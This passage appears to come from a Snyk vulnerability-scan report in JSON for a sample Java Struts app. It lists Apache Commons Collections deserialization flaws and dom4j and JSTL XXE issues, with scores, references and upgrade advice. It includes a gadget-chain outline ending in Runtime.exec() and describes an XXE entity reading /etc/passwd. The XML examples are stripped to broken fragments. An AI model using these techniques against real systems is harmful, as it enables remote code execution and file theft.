Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.2.2)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.6, + "functions": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/commons-collections/pull/18", + "title": "GitHub PR" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:34.698666Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:35.761152Z" + } + ], + "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", + "epssDetails": { + "percentile": "0.82603", + "probability": "0.00880", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-6420" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6hgm-866r-3cjv" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2019-10-10T18:31:03.943542Z", + "functions_new": [ + { + "version": [ + "[3.1, 3.22)", + "[,3.0-dev2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-10T00:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2020-02-24T00:00:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:35.761152Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a 